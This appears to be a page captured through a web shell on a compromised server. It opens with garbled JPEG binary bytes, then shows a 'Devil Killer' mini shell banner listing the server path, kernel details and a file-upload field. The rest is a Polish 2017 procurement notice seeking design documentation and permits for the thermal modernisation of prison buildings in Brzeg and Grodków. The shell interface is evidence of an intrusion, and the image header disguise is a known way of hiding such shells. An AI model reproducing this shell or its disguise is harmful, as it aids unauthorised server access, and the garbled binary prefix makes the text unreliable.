JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170407/61027-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zp.sw.gov.pl' target='_blank'>http://www.zp.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 61027 - 2017
              z dnia 2017-04-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Brzeg: Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-technicznej budynków Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie wraz z pełnieniem nadzoru autorskiego i uzyskaniem niezbędnych decyzji i pozwoleń na realizację robót budowlanych.
Przedmiot zamówienia jest realizowany w ramach Projektu pn.: Termomodernizacja budynków Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie  nr POIS.01.03.01-0000091/16, w ramach poddziałania 1.3.1 oś piorytetowa Zmniejszenie emisyjności gospodarki Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Przedmiot zamówienia jest realizowany w ramach Projektu pn.: Termomodernizacja budynków Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie  nr POIS.01.03.01-0000091/16, w ramach poddziałania 1.3.1 oś piorytetowa Zmniejszenie emisyjności gospodarki Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Karny, krajowy numer identyfikacyjny
              32019900000, ul.
              ul. Chrobrego 
              29,
              49300  
              Brzeg, woj.
              opolskie, państwo
              Polska, tel.
              774 162 011, e-mail
              zk_brzeg@sw.gov.pl, faks
              774 162 287.
              <br />
              Adres strony internetowej (URL): www.zp.sw.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Państwowa jednostka organizacyjna nieposiadajaca osobowości prawnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zp.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  tak
                <br />www.zp.sw.gov.pl</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w sposób pisemny<br />
                Adres:
                <br />Sekretariat  Dyrektora Zakładu Karnego w Brzegu  ul. Chrobrego 29, 49-300 Brzeg</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-technicznej budynków Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie wraz z pełnieniem nadzoru autorskiego i uzyskaniem niezbędnych decyzji i pozwoleń na realizację robót budowlanych.
Przedmiot zamówienia jest realizowany w ramach Projektu pn.: Termomodernizacja budynków Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie  nr POIS.01.03.01-0000091/16, w ramach poddziałania 1.3.1 oś piorytetowa Zmniejszenie emisyjności gospodarki Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.<br /><b>Numer referencyjny: </b>DKW.2230.01.2017.TB<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiot zamówienia:

Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-technicznej budynków Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie  wraz z pełnieniem nadzoru autorskiego i uzyskaniem niezbędnych decyzji i pozwoleń na realizację robót budowlanych. 

Przedmiotowe zamówienie jest realizowane w ramach Projektu pn.: Termomodernizacja budynków  Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie w związku z zawarciem umowy o dofinansowanie nr POIS.01.03.01-00-0091/16-00 w ramach poddziałania 1.3.1 oś priorytetowa Zmniejszenie emisyjności gospodarki Programu Operacyjnego Infrastruktura i Środowisko 2014  2020

Opracowanie dokumentacji projektowo-technicznej, niezbędne jest do przeprowadzenia postępowania o udzielenie zamówienia, zgodnie z ustawą z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tj. Dz.U. z 2015r. poz. 2164 z póżn. zm.) w celu wyłonienia wykonawcy zamówienia, na wykonanie robót budowlanych, polegających na termomodernizacji obiektów określonych powyżej. 


2. Opis przedmiotu zamówienia:

Dokumentacja projektowo-techniczna musi być opracowana w oparciu o założenia audytu energetycznego ex-ante  Metodyka sporządzania audytów energetycznych w zakresie głębokiej kompleksowej modernizacji energetycznej budynków w ramach POIiŚ 2014-2020 Poddziałanie 1.3.1 sporządzonego dla poszczególnych budynków:

a/ Zakładu Karnego w Brzegu, zlokalizowanego przy ul. Chrobrego 29, obejmującego:
- budynek penitencjarny pawilon A z częścią administracyjną 
- budynek penitencjarny pawilon B
Audyt ex-ante sporządzony przez: mgr inż. Ewa Pietrzak-Chojnicka, stanowiący załącznik nr 10 do SIWZ

b/ Oddziału Zewnętrznego w Grodkowie, zlokalizowanego przy ul. Sienkiewicza 23, obejmującego:
- budynek penitencjarny 
- budynek administracyjny
Audyt ex-ante sporządzony przez: mgr inż. Marek Hawrysz, stanowiący załącznik nr 11 do SIWZ

Wszystkie rozwiązania architektoniczne, budowlane, elektryczne i sanitarne powinny zawierać tylko elementy kwalifikowane określone w w/w audytach energetycznych budynków oraz założeniach i wytycznych do projektu POIS w ramach konkursu nr POIS/1.3.1/1/2015 dla poddziałania 1.3.1 Wspieranie efektywności energetycznej w budynkach użyteczności publicznej oraz zostać zaakceptowane przez Zamawiajacego,

Przy opracowywaniu dokumentacji wykonawca, zobowiązany jest uwzględnić:
- wymagania wynikające z ustawy z z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tj. Dz.U. z 2015r. poz. 2164 z póżn. zm.)  w szczególności wskazane w art. 29-31 i art. 33 tej ustawy,
- wytyczne w zakresie kwalifikowalności wydatków w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020,
- ramowy katalog kosztów / wydatków kwalifikowanych (załącznik nr 12 do regulaminu konkursu nr POIS.1.3.1/1/2015)

Opracowanie dokumentacji projektowo-technicznej obejmuje:

2.1 Sporządzenie projektu budowlanego (uwzględniającego wszystkie branże) termomodernizacji budynków Zakładu Karnego w Brzegu i Oddziału Zewnętrznego w Grodkowie, dla poszczególnych budynków: 
a/ Zakładu Karnego w Brzegu, zlokalizowanego przy ul. Chrobrego 29, obejmującego:
- budynek penitencjarny pawilon A z częścią administracyjną 
- budynek penitencjarny pawilon B
UWAGA: Budynki wpisane do rejestru zabytków nr rej.:2330/94 z dnia 26.05.1994r.

b/ Oddziału Zewnętrznego w Grodkowie, zlokalizowanego przy ul. Sienkiewicza 23, obejmującego:
- budynek penitencjarny 
- budynek administracyjny
UWAGA: Budynek penitencjarny jest wpisany do rejestru zabytków nr rej.:A-2364/96 z dnia 30.12.1996r.

Wykonanie projektów budowlanych (uwzględniające wszystkie branże) dla każdego z budynków w ilości: 4 egzemplarzy w formie pisemnej oraz 1 egzemplarz w formie elektronicznej (format: pdf); 

Wykonawca zobowiązany jest do uzyskania, na własny koszt, niezbędnych opinii i uzgodnień umożliwiających otrzymanie uprawomocnionych decyzji administracyjnych (pozwoleń na budowę, bądź zaświadczenia o niewniesieniu sprzeciwu do zgłoszenia zamiaru przystąpienia do wykonania robót budowlanych) w terminie realizacji przedmiotu zamówienia, opracowanych zgodnie z przepisami Prawa budowlanego i spełniającego wymagania  Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U.  poz. 462 z późn. zm.). 

2.2 Sporządzenie projektów wykonawczych (uwzględniających wszystkie branże), uzupełniających i uszczegóławiających projekty budowlane w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę i realizacji robót budowlanych. Projekty te muszą zezwalać na realizację wszystkich robót budowlano-montażowych bez dodatkowych opracowań. Projekty te muszą uwzględniać wymagania określone w § 5 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r. poz. 1129) 
Wykonanie projektów wykonawczych (uwzględniajace wszystkie branże) dla każdego z budynków w ilości: 4 egzemplarzy w formie pisemnej oraz 1 egzemplarza w formie elektronicznej (format: pdf); 

2.3 Sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych, przez które należy rozumieć opracowania zawierające w szczególności zbiory wymagań niezbędnych do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r. poz. 1129) 
Wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych dla każdego z budynków w ilości: 4 egzemplarzy w formie pisemnej oraz 1 egzemplarza w formie elektronicznej (format: pdf); 

2.4 Sporządzenie przedmiarów robót (uwzględniających wszystkie branże osobno) przez które należy rozumieć opracowania zawierające zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych. Przedmiary muszą uwzględniać wymagania określone od §6 do §10 Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r. poz. 1129) 
Wykonanie przedmiaru robót (uwzględniające wszystkie branże osobno) dla każdego z budynków w ilości: 2 egzemplarzy w formie pisemnej oraz 1 egzemplarza w formie elektronicznej (format: pdf oraz format edytowalny: ath);
2.5 Sporządzenie kosztorysów inwestorskich (uwzględniających wszystkie branże osobno) opracowanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389) 
Wykonanie kosztorysów inwestorskich (uwzględniających wszystkie branże osobno) dla każdego z budynków w ilości: 2 egzemplarzy w formie pisemnej oraz 1 egzemplarza w formie elektronicznej (format: pdf);

2.6 Sporządzenie informacji dotyczących bezpieczeństwa i ochrony zdrowia (BIOZ) 
Wykonanie informacji BiOZ dla każdego z budynków w ilości: 2 egzemplarzy w formie pisemnej oraz 1 egzemplarza w formie elektronicznej (format: pdf);

2.8 Złożenie do właściwego organu administracyjnego wniosku o wydanie decyzji o pozwoleniu na budowę, bądź zgłoszeniu zamiaru przystąpienia do wykonywania robót budowlanych, spełniającego wszystkie warunki niezbędne do uzyskania w/w decyzji. 
Wykonawca w terminie realizacji przedmiotu zamówienia jest zobowiazany uzyskać uprawomocnioną decyzje pozolenia na budowę, bądź zaświadczenie o niewniesieniu sprzeciwu do zgłoszonych robót budowlanych.

Do wykonanych opracowań Wykonawca dołączy ich wykaz oraz oświadczenie, iż są wykonane zgodnie z zamówieniem, dokonanymi uzgodnieniami, obowiązującymi przepisami, kompletne z punktu widzenia celu, któremu mają służyć. Zaproponowane materiały i urządzenia winny być opisywane z zachowaniem przepisów wynikających z art. 29  31 ustawy Pzp.


3. Dodatkowe uwarunkowania związane z przygotowaniem oferty i realizacją przedmiotu zamówienia:

3.1 Wykonawca dokona sprawdzenia rozwiązań projektowych w zakresie wynikającym z przepisów oraz uzyska wymagane opinie rzeczoznawców, uzgodnienia i decyzje administracyjne niezbędne do realizacji przedmiotu zamówienia (włącznie z konserwatorem zabytków, decyzją pozwolenia na budowę, bądź zgłoszeniem zamiaru przystąpienia do wykonywania robót budowlanych), a także poniesie związane z tym koszty. W szczególności wykonawca, uzgodni projekty pod względem ochrony przeciwpożarowej, spraw sanitarnohigienicznych, bezpieczeństwa i higieny pracy, przez uprawnionych rzeczoznawców.

3.2  Jeżeli do wykonania określonego opracowania przepisy prawa, wymagają posiadania odpowiednich uprawnień w szczególności uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie, w zakresie projektowania wykonawca realizując zamówienie, będzie posługiwał się osobami z odpowiednimi uprawnieniami i w odpowiedniej specjalności budowlanej oraz będącymi członkami właściwej izby budowlanej.

3.3 Wykonawca opracowując dokumentację musi mieć na względzie, że wszystkie projektowane roboty będą realizowane w czynnym obiekcie i nie mogą zaburzać funkcjonowania Zakładu Karnego w Brzegu oraz Oddziału Zewnętrznego w Grodkowie. W związku z powyższym zamawiający nie wyklucza konieczności określenia przez wykonawcę (w uzgodnieniu z zamawiającym) etapowości realizacji prac określonych w dokumentacji projektowej (projekty, kosztorys inwestroski, przedmiar robót, specyfikacja techniczna wykonania i odbioru robót)

3.4 Zamawiający nie posiada pełnej dokumentacji budynków, w których będzie przeprowadzana termomodernizacja. Wykonawca zobowiązany będzie do wykonania inwentaryzacji budynków (stanu istniejącego), koniecznych do prawidłowego zaprojektowania i skalkulowania wszystkich prac termomodernizacyjnych.

3.5 Zamawiający umożliwi wykonawcy, przed złożeniem oferty, zapoznanie się z terenem i budynkami objętym pracami projektowymi i przyszłymi robotami budowlanymi w celu zapoznania się ze stanem istniejącym i warunkami prac objętych przedmiotem zamówienia, które mogą być konieczne do prawidłowej wyceny wartości robót. Wyklucza się możliwość roszczeń wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do prawidłowego wykonania przedmiotu zamówienia. Zapoznanie się z terenem i obiektem przeprowadzone będzie na koszt wykonawcy. W celu ustalenia szczegółów w tym ustalenia daty i godziny przeprowadzenia oględzin wykonawca winien skontaktować się z działem kwatermistrzowskim Zakładu Karnego w Brzegu tel. 77 444 32 00 do 04 w.300, 302, e-mail: dkw_brzeg@sw.gov.pl

3.6 W ramach niniejszego zamówienia i wynagrodzenia wykonawca obowiązany jest uzyskać mapę do celów projektowych (jeżeli jest wymagana), uzyskać wymagane prawem uzgodnienia i wykonać dokumentację umożliwiającą uzyskanie decyzji o pozwoleniu na budowę, bądź dokonania zgłoszenia zamiaru przystąpienia do wykonywania robót budowlanych.

3.7 Przedmiot zamówienie obejmuje:
a) złożenie w imieniu zamawiającego, wniosku o wydanie pozwolenia na budowę, bądź dokonania zgłoszenia zamiaru przystąpienia do wykonywania robót budowlanych,
b) uzyskanie w terminie realizacji przedmiotu zamówienia, uprawomocnionej decyzji pozwolenia na budowę, bądź zaświadczenia o niewniesieniu sprzeciwu do zgłoszenia zamiaru przystąpienia do wykonania robót budowlanych
Zamawiający posiada prawo dysponowania nieruchomością na cele budowlane.

3.8 Wykonawca w trakcie opracowywania dokumentacji projektowej zobowiązany jest na bieżąco uzgadniać z zamawiającym proponowane rozwiązania techniczne, technologiczne i materiałowe. Zamawiający wymaga, aby wykorzystane zostały najnowsze technologie oraz zaprojektowane instalacje zapewniały zminimalizowanie kosztów utrzymania i eksploatacji obiektów.

3.9 Wykonawca na bieżąco będzie informował zamawiającego o postępie i zaawansowaniu prac oraz sygnalizować będzie pojawiające się zagrożenia i problemy, przy usunięciu których może być pomocne działanie zamawiającego.


4. Wykonawca zobowiązuje się do: 

4.1 Przygotowywania projektów odpowiedzi, na pytania związane z opracowanym opisem przedmiotu zamówienia, składane w trakcie trwania procedury zamówienia na wykonanie robót budowlanych w terminie do 2 dni od daty wystąpienia zamawiającego.
4.2 Wydania, na etapie analizy ofert i na wniosek zamawiającego, pisemnej opinii na temat parametrów materiałów lub urządzeń w przypadku zaproponowania w ofertach przetargowych na wykonanie robót budowlanych, materiałów lub urządzeń równoważnych", tzn.: o parametrach nie gorszych, niż przedstawione w opracowanej dokumentacji projektowej w terminie do 2 dni od daty wystąpienia zamawiającego.
4.3 Podania, na wniosek zamawiającego, co najmniej dwóch producentów materiałów lub urządzeń, dla których nie użyto, nazwy opierając opis w opracowanej dokumentacji projektowej na parametrach technicznych w terminie do 2 dni od daty wystąpienia zamawiającego.
4.4 Aktualizacji dokumentacji projektowo-kosztorysowej, związanej ze zmianami przepisów lub upływu czasu pomiędzy ich opracowaniem, a ogłoszeniem postępowania w celu udzielenia zamówienia publicznego na roboty budowlane. 
4.5 Jeżeli w trakcie postępowania o uzyskanie decyzji o pozwoleniu na budowę, nastąpi konieczność uzupełnień wniosku, a w szczególności zmian w załącznikach (np. projekt budowlany) wykonawca dokona takich zmian niezwłocznie. W ramach gwarancji wykonawca dokona zmian w dokumentacji projektowo-kosztorysowej w szczególności, celem dostosowania ich do projektu budowlanego zatwierdzonego, ostateczną decyzją o pozwoleniu na budowę.


5. Wykonawca zobowiązuje się sprawować nadzór autorski, podczas realizacji zadania objętego dokumentacją projektową, opracowaną przez wykonawcę. 

Wykonawca sprawować będzie nadzór autorski zgodnie z warunkami określonymi w opisie przedmiotu zamówienia, stosownie do art. 20 ust. 1 pkt. 4 Prawa budowlanego, z należytą starannością i na zasadzie zapewnienia najwyższej jakości usług, przy czym działania jego w ramach nadzoru autorskiego nie mogą powodować przeszkód i opóźnień w realizacji zadania.

5.1 Nadzór autorski sprawowany będzie począwszy od dnia rozpoczęcia robót budowlanych i trwał będzie nieprzerwanie do czynności odbioru końcowego i uzyskania pozwolenia na użytkowanie włącznie.
5.2 Wykonawca pełnić będzie nadzór autorski, uczestnicząc w czynnościach wymagających nadzoru wynikających z postępu robót, a także na każde wezwanie zamawiającego lub działającego w jego imieniu Inspektora nadzoru, przy czym:
a) przez pobyt rozumie się sprawowanie nadzoru autorskiego na i poza terenem budowy - jeżeli wynika to z potrzeb realizacji zadania;
b) czas reakcji wykonawcy na wezwanie powinien nastąpić nie później niż w następnym dniu roboczym po zgłoszeniu lub w terminie uzgodnionym z zamawiającym;

Obowiązki wykonawcy obejmować będą w szczególności:

5.3 Nadzór nad zgodnością wykonawstwa z dokumentacją projektową w zakresie rozwiązań użytkowych, technicznych, technologicznych, materiałowych i doboru urządzeń.
5.4 Wyjaśnianie wątpliwości zamawiającego i wykonawcy robót budowlanych powstałych w toku realizacji poprzez dodatkowe informacje i opracowania, w tym: rysunki robocze, uszczegółowiania rysunków wykonawczych, nanoszenia poprawek lub uzupełnień na dokumentację projektową.
5.5 Uzgadnianie z zamawiającym i wykonawcą robót budowlanych, możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej w zakresie materiałów i konstrukcji, rozwiązań technicznych, technologicznych i użytkowych, jednak o jakości i standardzie nie niższych niż przewidziano w dokumentacji projektowej.
